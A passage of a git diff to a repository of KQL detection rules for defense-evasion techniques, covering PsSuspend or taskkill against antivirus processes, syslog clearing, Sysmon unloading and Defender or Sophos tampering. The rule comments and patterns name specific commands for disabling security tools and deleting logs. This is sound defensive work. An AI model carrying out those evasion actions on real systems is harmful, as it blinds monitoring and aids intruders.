PowerShell code using SyncAppvPublishingServer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - App-V clients + +DeviceProcessEvents | where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql index 9810ca56..2086b083 100644 --- a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql +++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql @@ -1,10 +1,10 @@ -// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code -// Author: frack113 -// Date: 2021-07-16 -// Level: medium -// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.t1216 - -DeviceProcessEvents +// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code +// Author: frack113 +// Date: 2021-07-16 +// Level: medium +// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1216 + +DeviceProcessEvents | where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql index 8e98a66b..6e39985e 100644 --- a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql +++ b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql @@ -1,12 +1,12 @@ -// Title: Sysinternals PsSuspend Suspicious Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-23 -// Level: high -// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Sysinternals PsSuspend Suspicious Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-23 +// Level: high +// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql index 8ac7a924..b2e94c6a 100644 --- a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql +++ b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql @@ -1,13 +1,13 @@ -// Title: Syslog Clearing or Removal Via System Utilities -// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-10-15 -// Level: high -// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.002 -// False Positives: -// - Log rotation. -// - Maintenance. - -DeviceProcessEvents +// Title: Syslog Clearing or Removal Via System Utilities +// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: high +// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Log rotation. +// - Maintenance. + +DeviceProcessEvents | where (ProcessCommandLine contains "/var/log/syslog" and ((ProcessCommandLine contains "/dev/null" and FolderPath endswith "/cp") or ((ProcessCommandLine contains "-sf " or ProcessCommandLine contains "-sfn " or ProcessCommandLine contains "-sfT ") and (ProcessCommandLine contains "/dev/null " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/ln") or FolderPath endswith "/mv" or ((ProcessCommandLine contains " -r " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " -rf " or ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/rm") or (ProcessCommandLine contains "-u " and FolderPath endswith "/shred") or ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "-c " or ProcessCommandLine contains "--size") and (ProcessCommandLine contains "0 " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/truncate") or FolderPath endswith "/unlink")) or ((ProcessCommandLine contains "journalctl --vacuum" or ProcessCommandLine contains "journalctl --rotate") or (ProcessCommandLine contains " > /var/log/syslog" or ProcessCommandLine contains " >/var/log/syslog" or ProcessCommandLine contains " >| /var/log/syslog" or ProcessCommandLine contains ": > /var/log/syslog" or ProcessCommandLine contains ":> /var/log/syslog" or ProcessCommandLine contains ":>/var/log/syslog" or ProcessCommandLine contains ">|/var/log/syslog")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql index dc428207..d48c7077 100644 --- a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql +++ b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql @@ -1,12 +1,12 @@ -// Title: Sysmon Configuration Update -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-09 -// Level: medium -// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administrators might use this command to update Sysmon configuration. - -DeviceProcessEvents +// Title: Sysmon Configuration Update +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: medium +// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators might use this command to update Sysmon configuration. + +DeviceProcessEvents | where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c" or ProcessCommandLine contains "–c" or ProcessCommandLine contains "—c" or ProcessCommandLine contains "―c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql index f305d2d9..c645dd67 100644 --- a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql +++ b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql @@ -1,13 +1,13 @@ -// Title: Sysmon Driver Altitude Change -// Author: B.Talebi -// Date: 2022-07-28 -// Level: high -// Description: Detects changes in Sysmon driver altitude value. -// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate driver altitude change to hide sysmon - -DeviceRegistryEvents +// Title: Sysmon Driver Altitude Change +// Author: B.Talebi +// Date: 2022-07-28 +// Level: high +// Description: Detects changes in Sysmon driver altitude value. +// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate driver altitude change to hide sysmon + +DeviceRegistryEvents | where RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql index 330c59d9..cbf2e305 100644 --- a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql +++ b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql @@ -1,12 +1,12 @@ -// Title: Sysmon Driver Unloaded Via Fltmc.EXE -// Author: Kirill Kiryanov, oscd.community -// Date: 2019-10-23 -// Level: high -// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Sysmon Driver Unloaded Via Fltmc.EXE +// Author: Kirill Kiryanov, oscd.community +// Date: 2019-10-23 +// Level: high +// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql index 7c808195..667c079f 100644 --- a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql +++ b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql @@ -1,10 +1,10 @@ -// Title: System Control Panel Item Loaded From Uncommon Location -// Author: Anish Bogati -// Date: 2024-01-09 -// Level: medium -// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceImageLoadEvents +// Title: System Control Panel Item Loaded From Uncommon Location +// Author: Anish Bogati +// Date: 2024-01-09 +// Level: medium +// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceImageLoadEvents | where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql index a581c612..ed35a173 100644 --- a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql +++ b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql @@ -1,10 +1,10 @@ -// Title: System File Execution Location Anomaly -// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2017-11-27 -// Level: high -// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: System File Execution Location Anomaly +// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-11-27 +// Level: high +// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql index 10f3b51e..7419fa36 100644 --- a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql +++ b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql @@ -1,13 +1,13 @@ -// Title: System Information Discovery Via Sysctl - MacOS -// Author: Pratinav Chandra -// Date: 2024-05-27 -// Level: medium -// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. -// This process is primarily used to detect and avoid virtualization and analysis environments. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082 -// False Positives: -// - Legitimate administrative activities - -DeviceProcessEvents +// Title: System Information Discovery Via Sysctl - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-27 +// Level: medium +// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. +// This process is primarily used to detect and avoid virtualization and analysis environments. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents | where (ProcessCommandLine contains "hw." or ProcessCommandLine contains "kern." or ProcessCommandLine contains "machdep.") and (FolderPath endswith "/sysctl" or ProcessCommandLine contains "sysctl") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql index 4acb55af..b6835f6a 100644 --- a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql +++ b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql @@ -1,12 +1,12 @@ -// Title: Tamper Windows Defender Remove-MpPreference -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: high -// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate PowerShell scripts - -DeviceProcessEvents +// Title: Tamper Windows Defender Remove-MpPreference +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate PowerShell scripts + +DeviceProcessEvents | where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql index 29b78207..86bf9496 100644 --- a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql +++ b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql @@ -1,12 +1,12 @@ -// Title: Tamper With Sophos AV Registry Keys -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-02 -// Level: high -// Description: Detects tamper attempts to sophos av functionality via registry key modification -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate - -DeviceRegistryEvents +// Title: Tamper With Sophos AV Registry Keys +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects tamper attempts to sophos av functionality via registry key modification +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql index c495f662..6d768a6a 100644 --- a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql +++ b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql @@ -1,12 +1,12 @@ -// Title: Taskkill Symantec Endpoint Protection -// Author: Ilya Krestinichev, Florian Roth (Nextron Systems) -// Date: 2022-09-13 -// Level: high -// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. -// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. -// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Taskkill Symantec Endpoint Protection +// Author: Ilya Krestinichev, Florian Roth (Nextron Systems) +// Date: 2022-09-13 +// Level: high +// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. +// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. +// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql index 748e26bb..983a3725 100644 --- a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql +++ b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql @@ -1,10 +1,10 @@ -// Title: Taskmgr as LOCAL_SYSTEM -// Author: Florian Roth (Nextron Systems) -// Date: 2018-03-18 -// Level: high -// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Taskmgr as LOCAL_SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-18 +// Level: high +// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql index 1a84fbe5..aebbe968 100644 --- a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql +++ b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql @@ -1,10 +1,10 @@ -// Title: TeamViewer Log File Deleted -// Author: frack113 -// Date: 2022-01-16 -// Level: low -// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceFileEvents +// Title: TeamViewer Log File Deleted +// Author: frack113 +// Date: 2022-01-16 +// Level: low +// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceFileEvents | where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql index b8d52e0a..f9c3f0a9 100644 --- a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Third Party Software DLL Sideloading -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-08-17 -// Level: medium -// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Third Party Software DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: medium +// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql index 4a6a02a3..5bf2459b 100644 --- a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql +++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql @@ -1,12 +1,12 @@ -// Title: Time Travel Debugging Utility Usage -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020-10-06 -// Level: high -// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001 -// False Positives: -// - Legitimate usage by software developers/testers - -DeviceProcessEvents +// Title: Time Travel Debugging Utility Usage +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-06 +// Level: high +// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001 +// False Positives: +// - Legitimate usage by software developers/testers + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\tttracer.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql index a16d7d8e..8320f98e 100644 --- a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql +++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql @@ -1,12 +1,12 @@ -// Title: Time Travel Debugging Utility Usage - Image -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020-10-06 -// Level: high -// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001 -// False Positives: -// - Legitimate usage by software developers/testers - -DeviceImageLoadEvents +// Title: Time Travel Debugging Utility Usage - Image +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-06 +// Level: high +// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001 +// False Positives: +// - Legitimate usage by software developers/testers + +DeviceImageLoadEvents | where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql index 43170943..f6845c88 100644 --- a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql +++ b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql @@ -1,13 +1,13 @@ -// Title: Tomcat WebServer Logs Deleted -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-16 -// Level: medium -// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 -// False Positives: -// - During uninstallation of the tomcat server -// - During log rotation - -DeviceFileEvents +// Title: Tomcat WebServer Logs Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-16 +// Level: medium +// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - During uninstallation of the tomcat server +// - During log rotation + +DeviceFileEvents | where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql index 4400edb6..3ae7800a 100644 --- a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql +++ b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql @@ -1,12 +1,12 @@ -// Title: Touch Suspicious Service File -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-01-11 -// Level: medium -// Description: Detects usage of the "touch" process in service file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.006 -// False Positives: -// - Admin changing date of files. - -DeviceProcessEvents +// Title: Touch Suspicious Service File +// Author: Joseliyo Sanchez, 